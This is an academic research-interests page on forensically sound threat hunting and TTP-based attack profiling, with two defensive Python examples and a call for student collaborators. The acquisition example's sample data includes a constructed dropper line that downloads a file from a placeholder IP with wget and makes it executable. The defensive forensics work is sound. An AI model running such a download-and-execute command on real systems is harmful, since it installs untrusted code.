Research on practical/technical aspects of digital forensics, threat hunting and threat intelligence always inspires me. Please note that, although I use all sorts of computer science techniques (e.g., machine learning, data analytics, etc.) in my work, I am only interested in solving hunting/investigation problems, not in advancing the field in other areas. Also note that I am not interested in cryptography or intrusion detection in the general sense. Current attacks are more sophisticated and specific, and although what I do is related to IDS, I target more specific problems in order to have more effective solutions (e.g., APT detection, exploitation detection, etc.), as follows:
Forensically Sound Cyber Threat Hunting and Intelligence
Today's adversaries, including Advanced Persistent Threat (APT) actors, accomplish their goals using advanced tools and techniques designed to circumvent most conventional computer network defence mechanisms, go undetected during the intrusion, and then remain undetected on networks over long periods of time. Hence it is necessary to build tools, techniques and strategies to hunt for attackers' remnants in different host and network locations, and to utilise fuzzy learning and deep learning techniques to analyse the collected data and build intelligence that can be used to determine threat actors' tactics, techniques and procedures (TTPs). It is equally important to guarantee forensic soundness during the collection and preservation of threat actors' remnants (forensically sound threat hunting) and to preserve users' privacy by collecting only the data relevant to the given investigation case. Following are a couple of more focused research areas in this domain:
Cyber Threat Hunting and Intelligence in Internet of Things (IoT) and Industrial Control Systems (ICS)
With the fast integration of computation and networking into all physical processes and the development of many smart contexts, the spectrum of devices that can be investigated is extensive: a range of devices and protocols, from PDAs and mobile devices to automobiles, sensors and robots, all pervasively interconnected. The examination of these devices is a crucial component of future legal, governmental and business investigations. Therefore, we need models and frameworks for the forensically sound collection, preservation, analysis and documentation of evidence in these environments.
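The two requirements above, that acquisition be forensically sound (every artefact hashed as it is collected, with a tamper-evident record) and that it respect privacy (only data within the case scope is ever read), can be shown in a few dozen lines. The following is an added example written for this page, not the author's own code or any published framework. The "host" is an in-memory dictionary constructed here so the script runs offline; the scope format (a list of path prefixes) and the manifest layout are assumptions for the example.

```python
"""Scoped, forensically sound artefact acquisition with an integrity manifest.

Added example, not the page author's code. The "host" is an in-memory dict
of path -> bytes constructed here, so the script runs offline; on a real
system the same logic would wrap file reads on a write-blocked image.
Assumptions: the case scope is a list of path prefixes, and the acquisition
timestamp comes from the system clock.
"""
import hashlib
import json
from datetime import datetime, timezone

# Constructed sample host (paths and contents are illustrative).
SAMPLE_HOST = {
    "/var/log/auth.log": b"Jan 10 03:12:01 gw sshd[812]: Accepted password for root from 10.0.0.9\n",
    "/var/log/syslog": b"Jan 10 03:12:05 gw cron[77]: (root) CMD (/tmp/.x/run)\n",
    "/tmp/.x/run": b"#!/bin/sh\nwget http://203.0.113.5/p -O /tmp/p && chmod +x /tmp/p\n",
    "/home/user/photos/holiday.jpg": b"\xff\xd8\xff\xe0 personal image data",
    "/home/user/notes.txt": b"shopping list",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def in_scope(path: str, scope) -> bool:
    """True if `path` is one of the scope entries or lies beneath one."""
    return any(path == p or path.startswith(p.rstrip("/") + "/") for p in scope)


def acquire(host: dict, scope, examiner: str) -> dict:
    """Copy only in-scope artefacts, hashing each one at the moment it is read."""
    entries, data = [], {}
    for path in sorted(host):
        if not in_scope(path, scope):
            continue  # out-of-scope (e.g. personal) data is never read
        blob = host[path]
        data[path] = blob
        entries.append({"path": path, "size": len(blob), "sha256": sha256_hex(blob)})
    manifest = {
        "examiner": examiner,
        "acquired_at": datetime.now(timezone.utc).isoformat(),
        "scope": sorted(scope),
        "entries": entries,
        # Hash over the entry list so the record itself is tamper-evident.
        "entries_sha256": sha256_hex(json.dumps(entries, sort_keys=True).encode()),
    }
    return {"data": data, "manifest": manifest}


def verify(image: dict) -> list:
    """Return integrity failures; an empty list means data and manifest agree."""
    m = image["manifest"]
    failures = []
    if sha256_hex(json.dumps(m["entries"], sort_keys=True).encode()) != m["entries_sha256"]:
        failures.append("manifest entries altered")
    listed = set()
    for e in m["entries"]:
        listed.add(e["path"])
        blob = image["data"].get(e["path"])
        if blob is None:
            failures.append("missing: " + e["path"])
        elif sha256_hex(blob) != e["sha256"]:
            failures.append("modified: " + e["path"])
    for path in image["data"]:
        if path not in listed:
            failures.append("unlisted: " + path)
    return failures


if __name__ == "__main__":
    img = acquire(SAMPLE_HOST, ["/var/log", "/tmp"], "examiner-1")
    print(json.dumps(img["manifest"], indent=2))
    print("verify:", verify(img) or "OK")
```

Running it with the scope `["/var/log", "/tmp"]` copies the three log and dropper artefacts and leaves the user's photos and notes unread; `verify` then reports nothing. Changing a single byte of an acquired file, or editing a hash in the manifest, produces a named failure. In a real deployment the manifest would also be signed or stored with a trusted timestamp, since a plain hash only proves integrity to whoever holds an unaltered copy of it.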
Real-Time Malware Detection in IoT/ICS Networks
IoT platforms are an attractive means of spreading and dispatching malicious programs, as these systems usually lack standard detection/protection systems (i.e. firewalls, IDS, etc.) and end nodes usually employ no defensive mechanism of their own. Therefore, developing lightweight and generalisable techniques for real-time detection of malicious programs is important for securing IoT networks.
Attack Profiling using Attackers TTPs
While many existing attack attribution techniques rely on easy-to-change Indicators of Compromise (IOCs) such as file hashes, IP addresses and domain names, reliable attack profiling should be based on attackers' Tactics, Techniques and Procedures (TTPs), which are hard to change (refer to the Pyramid of Pain). Utilising pattern recognition, fuzzy and deep learning techniques to detect properties of attackers' TTPs, and automating the detection process so that it is suitable for large-scale deployment, is an interesting research challenge.
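The difference between matching on IOCs and matching on behaviour is easiest to see on concrete telemetry. The following is an added example written for this page, not the author's code or any published detector: the events, hashes, addresses and the behaviour rule are all constructed. It runs the same two "campaigns" through a hash/IP matcher and through a simple TTP-style rule (execution from a user-writable directory followed by an outbound connection), and the second campaign, which only changed its hash, path and C2 address, is caught by the rule but not by the indicators.

```python
"""IOC matching versus behaviour (TTP) matching over the same endpoint events.

Added example, not the page author's code. The events, hashes, addresses and
the behaviour rule are all constructed for illustration. Assumed event
fields: process start (image path, file hash) and outbound connection
(destination, port), keyed by host and PID.
"""
import ipaddress
from dataclasses import dataclass


@dataclass
class Event:
    ts: int            # seconds since some epoch
    host: str
    pid: int
    kind: str          # "process" or "network"
    image: str = ""    # process: executable path
    sha256: str = ""   # process: hash of the executable (constructed values below)
    dst: str = ""      # network: destination IP
    dport: int = 0     # network: destination port


# Bottom of the Pyramid of Pain: a hash and an IP learned from campaign A.
IOC_HASHES = {"3b1f" * 16}
IOC_IPS = {"203.0.113.5"}

# Behaviour rule ingredients (constructed heuristic): execution from a
# user-writable location followed by an outbound connection to a
# non-internal address.  Documentation ranges (203.0.113.0/24 etc.) play
# the role of "external" here, so internal is defined explicitly rather
# than via ipaddress.is_private, which treats those ranges as non-global.
WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def ioc_matches(events):
    """Flat indicator matching: cheap for the defender, cheap for the attacker to evade."""
    return [e for e in events
            if (e.kind == "process" and e.sha256 in IOC_HASHES)
            or (e.kind == "network" and e.dst in IOC_IPS)]


def ttp_matches(events, window=60):
    """Pair each process started from a writable path with an external
    connection it makes within `window` seconds, regardless of hash or IP."""
    candidates, hits = {}, []
    for e in sorted(events, key=lambda ev: ev.ts):
        key = (e.host, e.pid)
        if e.kind == "process":
            if e.image.lower().startswith(WRITABLE_PREFIXES):
                candidates[key] = e
            else:
                candidates.pop(key, None)   # PID reused by a benign process
        elif e.kind == "network" and key in candidates:
            p = candidates[key]
            if 0 <= e.ts - p.ts <= window and not is_internal(e.dst):
                hits.append((p, e))
    return hits


# Constructed sample telemetry.
SAMPLE_EVENTS = [
    # Campaign A: the loader whose hash and C2 address are in the IOC feed.
    Event(100, "ws1", 4101, "process",
          image="C:\\Users\\alice\\AppData\\Local\\Temp\\svc.exe", sha256="3b1f" * 16),
    Event(104, "ws1", 4101, "network", dst="203.0.113.5", dport=443),
    # Campaign B: same tradecraft, recompiled loader, new path, new C2.
    Event(300, "ws2", 5220, "process",
          image="C:\\ProgramData\\update\\u.exe", sha256="9c4e" * 16),
    Event(310, "ws2", 5220, "network", dst="198.51.100.7", dport=8443),
    # Benign: a system binary talking to an external update server.
    Event(400, "ws3", 61, "process",
          image="C:\\Windows\\System32\\svchost.exe", sha256="77aa" * 16),
    Event(402, "ws3", 61, "network", dst="198.51.100.20", dport=443),
    # Benign: a user-dir tool talking only to an internal file server.
    Event(500, "ws4", 77, "process",
          image="C:\\Users\\bob\\Downloads\\tool.exe", sha256="d0d0" * 16),
    Event(504, "ws4", 77, "network", dst="10.0.0.20", dport=445),
]


if __name__ == "__main__":
    print("IOC hits:", [(e.host, e.kind) for e in ioc_matches(SAMPLE_EVENTS)])
    print("TTP hits:", [(p.host, p.image, n.dst) for p, n in ttp_matches(SAMPLE_EVENTS)])
```

The indicator matcher fires only on the ws1 events; the behaviour rule fires on ws1 and ws2 and stays quiet on both benign hosts. The rule is still evadable (run from a trusted path, beacon through an internal proxy), which is exactly the Pyramid of Pain argument: moving up the pyramid raises the attacker's cost of change rather than eliminating it, and the research problem in the paragraph above is learning such rules from data at scale rather than hand-writing them.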
Detecting Software Vulnerabilities and 0-Day Exploits
With the fast growth of the IT industry and the huge pressure to develop software quickly, large numbers of vulnerabilities are disclosed every day. Timely detection and proper handling of these vulnerabilities require sustained research. Developing (semi-)automated tools and techniques for the detection of 0-day vulnerabilities, and mechanisms to mitigate the risks of 0-day exploits, are important goals of this project.
Future Students & Research Collaboration
I am always looking for active undergraduate, master's and Ph.D. students and post-doc candidates interested in working on practical aspects of cyber-security and digital forensics! If you are interested in cyber-security and digital forensics, I would love to hear from you! We can further discuss and define specific projects suitable for your level, as follows:
- Short-Term Research Projects (2-4 months, suitable for master-by-course or final-year degree students): I occasionally have good short-term (2-4 month) projects in digital forensics. These projects are suitable for final-year degree students or master-by-course (MSc) candidates looking to advance their skills in digital investigation and wanting some publications. I usually expect at least one good paper out of a short-term project.
- Visiting Fellows & Sabbatical Projects (3 months to 1 year): If you are an experienced researcher in cyber-forensics or security and are looking for an international research centre to spend your sabbatical leave or fellowship period, you may consider joining us! Please feel free to contact me to further discuss opportunities and requirements.
- Ph.D. and Master-by-Research (MPhil) Research Projects (1-3 years): I almost always have good practical mid-term and long-term research projects for hardworking candidates! I believe master's and Ph.D. projects should first be well defined and then passed to talented students to complete! If you are looking to extend your research skills and expertise in digital forensics or cyber-security, you may consider contacting me with a short CV and a brief statement of interest.
- Post-doctoral Projects (1-2 years): EU and UK research funds offer good opportunities to conduct post-doctoral research. As a post-doc applicant you should have a strong research proposal/plan, a good resume with several refereed journal papers, and the patience to go through the usually long funding application process. If you are looking for a post-doc position in digital forensics or malware analysis, you may contact me with your resume and we can work on developing a strong research proposal for EU and UK funding calls!
- Remote Research Collaboration: Pervasive network connectivity has made it much easier to collaborate remotely on different research topics. I am always keen to establish remote research collaboration with serious researchers! Surveying security awareness and contextual cyber-security research (in the context of your country/location) on previously established topics are usually good starting points for remote collaboration. If you are interested in remote research, please feel free to contact me with a brief statement of your background and what you are looking for, to initiate our collaboration.
Please feel free to contact me for further information or to make an appointment.